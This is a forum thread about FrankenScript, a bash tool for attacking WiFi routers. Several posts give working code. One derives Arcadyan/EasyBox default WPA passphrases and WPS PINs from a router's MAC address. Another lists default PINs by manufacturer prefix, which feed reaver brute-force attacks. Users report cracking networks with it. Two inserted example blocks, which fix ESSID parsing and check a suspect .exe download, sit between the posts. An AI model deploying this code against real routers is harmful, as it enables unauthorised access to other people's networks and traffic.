Slim... We all know it's not you... Breathe! LoL
Upload to 0bin.net (that's a zero and then bin.net), great for all kinds of uses as it's an encrypted pastebin
Or use Dropbox if you want.
You assembled a great script and we all want to access it.
@ zimmaro
Cheers for the suggestion mate, will look into it.
@ brazen
Cheers for the suggestion, will look into it too.
Sorry it sounded like I was moaning/bitching at you, I wasn't, it's just how I talk/type. LOL
@ flyinghaggis
I'll run through the obvious first:
1) Did you select your WiFi device?
2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?
3) Did you enable attack mode?
4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?
5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?
6) Is the temp folder in the FrankenScript directory empty?
Other possible causes could be:
Sleep timing might need to be increased.
It's possible that you might have double tapped the keyboard button, or held it down too long.
If more people report issues I'll have to think about changing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.
FrankenScript-v3.1
UPDATED: 1/18/2014
MDK3 - access point reset files are now deleted.
Changed and added sleep timing.
Changed WiFi device detection again.
PasteBin:
http://goo.gl/PzaT5t
Last edited by slim76; 2014-01-18 at 15:45.
Smile while you can for in the future there may be nothing to smile about.
Sorry, but this could not be translated.
We tried to get your download as a download file from your sites. We spent an hour and never got the file. We went to the pastebin site and captured the text for Version 3.1. When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three (3) times and ran it and got the same error. We cannot capture the error as the screen constantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count
sorry i have no idea just found it while searching around.
I also finally got around to testing your version 1.3 of FrankenScript. I really like it; it cracked a WPS-enabled router, but I do have one problem (fsc.JPG): when scanning for networks to collect a handshake, your script doesn't display the full name of the router. As you can see from my screenshot, this could be a problem; the Suddenlink routers have some code that follows its name.
Sorry matey, I'll look into it and see if I can fix it for the next update.
Does it contain any symbols or does it just consist of characters and digits? Can you post an example (full broadcast essid) please?
Try this:
Look in FrankenScript for the following lines:
----------------------------------------------------------------------
###### [4] Capture WPA/WPA2 Handshake ######
4)
cd $HOME/FrankenScript/temp
clear
echo $RED"Scan for possible targets."
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
read -p $GREEN"Press [Enter] to start the scan.$STAND"
xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
sleep 1
PresentedAPs=$(cat PresentedAPs.txt)
Change this line:
---------------------------
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
Replace it with this line:
--------------------------------------
cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt
Last edited by slim76; 2014-01-28 at 13:31.
I tried your fix, it didn't help, but here is a screenshot of the networks: suc.JPG
I can't see any reason why it's doing what you say.
The only thing I can think of is that the broadcast essid might have spaces in its name. I used the awk command to print columns, so anything with a space would be a different column and wouldn't be printed on the screen.
They don't have any spaces. I believe it's caused by the period in their names, because that's where it cuts off.
It's strange, because you've tried two different commands.
One command grepped for the last column, the other command deleted everything up to the beginning of the essid (so the essid and everything after should have been printed).
I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(
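An added example, not part of any post in this thread: a reproduction of the truncation discussed above on constructed airodump-ng-style rows. It assumes the 11-column layout that the posted `awk '{ print $11 }'` line implies and that the MB column may or may not end in a period; the ESSIDs and BSSIDs are made up.

```bash
#!/usr/bin/env bash
# Constructed rows, not captured output. Assumed column order:
# BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
sample_rows() {
cat <<'EOF'
00:11:22:33:44:55  -60       10        0    0   6  54e. WPA2 CCMP   PSK  HomeNet.example-1234
66:77:88:99:AA:BB  -70       12        0    0  11  54e  WPA2 CCMP   PSK  HomeNet.example-5678
CC:DD:EE:FF:00:11  -72        8        0    0   1  54e. WPA2 CCMP   PSK  Guest Net 2
EOF
}

# The two steps the thread's pipeline applies to every row:
# 1) sed turns the FIRST period on the row into a space,
# 2) awk prints a single whitespace-separated field.
# When the MB column has no trailing period (row 2), the first period on
# the row is inside the ESSID, so the name is split there and cut short.
essid_as_in_thread() {
    sed -r -e 's/\./ /' | awk '{ print $11 }'
}

# Leave periods untouched and print field 11 through the last field, so
# names containing periods or spaces come out whole. Runs of spaces inside
# a name collapse to one space, because awk re-joins the fields.
essid_whole() {
    awk '{ out = $11; for (i = 12; i <= NF; i++) out = out " " $i; print out }'
}

# Number the names the way the script's target menu does.
numbered_menu() {
    essid_whole | nl -ba -w 1 -s ': '
}
```

Running `sample_rows | essid_as_in_thread` shows the second name cut at its period and the third cut at its first space, while `sample_rows | numbered_menu` lists all three in full.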
I made an update of wpspin and I implemented the algorithm corrected in bash in a function called arcadyan.
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables.
You "feed it" with $BSSID, which is the MAC address of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING, which are the 7 numbers of the PIN,
then it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:
ARCADYAN(){
# WPSPIN 1.5 - GPL v 3 by kcdtv
# This function uses three amazing works
# 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
# 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
# 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
#
# Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
# This function is based on the script easybox_keygen.sh previously mentioned
#
# The quotation from the original work start with double dash and are between quotes
# Some variables and line are changed for a better integration and I add the PIN calculation and Coeman trick for default WPA
# the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged"
# This function requires $BSSID which is the mac address ( hex may format XX:XX:XX:XX:XX:XX)
# It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
# give the full WPS PIN ($PIN)

## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
# suppression of $take5 and $last4 compared with easybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID that is used in WPSPIN
## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))    ######unchanged
## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})    ######unchanged
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})    ######unchanged
K1=$((($c1)%16))    ######unchanged
K2=$((($c2)%16))    ######unchanged
X1=$((K1^${deci[3]}))    ######unchanged
X2=$((K1^${deci[2]}))    ######unchanged
X3=$((K1^${deci[1]}))    ######unchanged
Y1=$((K2^0x${hexi[1]}))    ######unchanged
Y2=$((K2^0x${hexi[2]}))    ######unchanged
Y3=$((K2^0x${hexi[3]}))    ######unchanged
Z1=$((0x${hexi[2]}^${deci[3]}))    ######unchanged
Z2=$((0x${hexi[3]}^${deci[2]}))    ######unchanged
Z3=$((K1^K2))    ######unchanged
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
# this to generate later our PIN, the 7 first digit
DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1)
# the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
CHECKSUM
}
I put you back CHECKSUM in case it helps you
Code:
CHECKSUM(){    # The function checksum was written for bash by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING`    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0    # to get a result using this function)
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`    # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`    # so we follow the pattern for our seven number
DIGIT=`expr $ACCUM '%' 10`    # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`    # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)    # Some zero-padding in case that the value of the PIN is under 10000000
}    # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if you have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please feel free to add any credits or such.
Code:
#!/bin/bash
#
#
#
#####################################################################
AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
ESSID=$(echo $AP_essid)
BSSID=$(echo $AP_bssid)
#####################################################################
FUNC_CHECKSUM(){
ACCUM=0
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
RESTE=`expr $ACCUM '%' 10`
}
CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
MAC=$(echo $FINBSSID | tr -d ':')
CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
FINESSID=$(echo $ESSID | cut -d '-' -f2)
PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
MACESSID=$(echo $PAREMAC$FINESSID)
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PINWPS1=$(printf '%08d\n' $PIN)
STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`
FUNC_CHECKSUM
PINWPS2=$(printf '%08d\n' $PIN)
STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`
FUNC_CHECKSUM
PINWPS3=$(printf '%08d\n' $PIN)
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&
   [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&
   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
then
CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
STRING4=`expr $RAIZ '+' 7`
PIN=`expr 10 '*' $STRING4`
FUNC_CHECKSUM
PINWPS4=$(printf '%08d\n' $PIN)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
# fixed: no space after '=', otherwise the shell tries to run 20329761 as a command
PIN4REAVER=20329761
;;
3039F2)
echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
PIN4REAVER=$PINWPS1
;;
esac
fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the 6 first digits of the arcadyan mac without the 2 points
Code:
;; XXXXXX | XXXXXX)
and then you generate string
then you generate the checksum to get the full PIN
Code:
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
Code:
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:
;; XXXXXX | XXXXXX)
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)
that you have to place in your case esac sentence, anywhere until it is before
Code:
;; *)
Sorry mate, I meant would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know its kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL
At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
(It seems that the arcadyan algorithm is used by Askey on some models; if I get confirmation of this I will post it here.)
cheers
Updated FrankenScript to 3.2.
Slim,
at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.
root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:
Please choose an option?: 3
Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.
Please wait...
[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]
Available Access Points.
Please input the number of your chosen target:
slim... this may just be me... see below... it worked correctly this time when i chose to disable processes that might cause issues: Y
********************************************
Please choose an option?: 1
Available WiFi Adapters.
########################
1: wlan0
Please input the number of your chosen WiFi adapter: 1
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface: wlan0
System Mode: Networking Mode Is Enabled
MAC address for mon0:
Please choose an option?: 2
What system mode would you like to set.
[1] = Put The System Into Networking Mode.
[2] = Put The System Into Attack Mode.
[3] = Return To Menu.
1, 2 or 3?: 2
Would you like to disable processes that might cause issues y/n?: y
Would you like to disable NetworkManager y/n?: y
Would you like to disable wpa_supplicant y/n?: y
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3051 dhclient
3057 dhclient
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
Current MAC: b8:8d:12:30:6b:f2 (unknown)
New MAC: 40:2d:60:68:79:8f (unknown)
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface: wlan0
System Mode: Attack Mode Is Enabled
MAC address for mon0: 40:2d:60:68:79:8f
Please choose an option?: 3
Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.
Glad to hear it's working for you. You'll have to have a little play with it to get used to it and to find out what works for you.
So what are your opinions regarding FrankenScript? Anything you would like to see added to it?
All constructive criticism welcome. :-)
Last edited by slim76; 2014-02-06 at 23:36.
Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.
I'd like to see other things you release
I'm very interested in trying this out slim. and major props for making it
I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.
I am also installing kali right now on another USB stick so we'll see how this goes.
Once again thanks for this major works. I looked at the script and it is huge. One of the largest I've ever seen next to Social engineering toolkit.
Hi slim,
I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.
You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!
I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
Not sure if I'm going upload it for everyone though, but I guess time will tell.
To soxrox 2212
Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.
Muskt Team A
Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.
Any more updates on the script coming?
slim76 just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned a couple of Wifis in minutes so far with it
So was this script incorporated in 1.0.7?
How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.
Anyways, continue the good work!!
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer, safari tells me that there may be possible phishing on the site but I think its clean... Proceed with caution. The original thread is here. Let me know if you can get it working!
@ learning.
I'm currently rewriting a couple of the attack options, then I'll upload it.
@ Quest.
It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.
@ soxrok2212.
I added Belkin default password generator ages ago lol, I also added some others too. :-)
To all,
Will upload the new version when I've rewritten some of the options.
That is just great!
If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.
If some of you can 'torrent' it, It will facilitate accessibility for all.
Thank you for all the work Slim!! Hopefully it will make its way in the next Kali.
dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?
Here's the latest FrankenScript.
WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.
FrankenScript2-10-06-2014.tar.gz
http://mir.cr/0HBX0O5C
Last edited by slim76; 2014-06-10 at 00:08.
some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz But FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).
The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.
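An added example, not part of the original post: a pre-extraction check for the mismatch described above, comparing a download's name and size with the values the post gives and confirming it starts with the gzip magic bytes rather than a Windows executable's `MZ` header. It reads the post's "1*081*616 b" as 1081616 bytes; the function names are this example's own.

```bash
#!/usr/bin/env bash
EXPECTED_NAME="FrankenScript2-10-06-2014.tar.gz"   # file name given in the post
EXPECTED_SIZE=1081616                               # bytes, as read from the post

# Print the first two bytes of a file as lowercase hex, e.g. 1f8b.
magic2() {
    head -c 2 -- "$1" | od -An -tx1 | tr -d ' \n'
}

# check_download FILE [NAME] [SIZE]
# Returns 0 only when the name, the size and the gzip magic all match.
# Non-zero codes: 1 missing, 2 wrong name, 3 wrong size,
#                 4 Windows executable, 5 some other non-gzip content.
check_download() {
    local file="$1" name="${2:-$EXPECTED_NAME}" size="${3:-$EXPECTED_SIZE}"
    local actual magic

    [ -f "$file" ] || { echo "missing: $file"; return 1; }

    # A double extension such as .tar.gz.exe fails here.
    if [ "$(basename -- "$file")" != "$name" ]; then
        echo "unexpected name: $(basename -- "$file")"
        return 2
    fi

    actual=$(wc -c < "$file" | tr -d ' ')
    if [ "$actual" -ne "$size" ]; then
        echo "unexpected size: $actual bytes, expected $size"
        return 3
    fi

    # Content check, so a renamed executable is still caught.
    magic=$(magic2 "$file")
    case "$magic" in
        1f8b) ;;                                        # gzip stream
        4d5a) echo "Windows executable (MZ header)"; return 4 ;;
        *)    echo "not gzip data (starts with $magic)"; return 5 ;;
    esac

    echo "ok: $file"
}

# Usage: ./check.sh path/to/FrankenScript2-10-06-2014.tar.gz
if [ "$#" -gt 0 ]; then
    check_download "$1"
fi
```

A pass only means the file looks like the archive the post describes; the post publishes no hash, so the content itself cannot be verified this way.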
Thank you Slim!!